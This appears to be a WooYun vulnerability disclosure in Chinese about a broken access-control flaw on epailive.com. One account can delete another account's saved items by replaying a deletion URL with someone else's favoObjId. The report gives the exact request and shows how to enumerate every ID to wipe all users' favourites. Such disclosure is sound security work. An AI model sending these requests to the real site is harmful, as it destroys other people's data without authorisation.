WooYun.org

首先注册两个账户USERA，USERB
首先登录USERA，随便收藏个商品
如下图：

然后我们截获一下，删除收藏的请求

我们看到删除的请求为
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342
不要把请求发送过去，记录下这个favoObjId值为23342
刷新下页面，确保没有删除这个收藏，然后USERA可以退出了。
然后USERB登场，在浏览器上敲一下这个请求
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342
好他的任务完成了，退出吧。
然后USERA再登场，查看下我的收藏。收藏品没了，大功告成！

以上是证明了可以越权删除他人的收藏，每个用户收藏一个商品favoObjId就会加1.那么好吧，我们遍历一下：
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=1
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=2
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=3
.
.
.
.
http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342
当然我是孩子，从不淘气......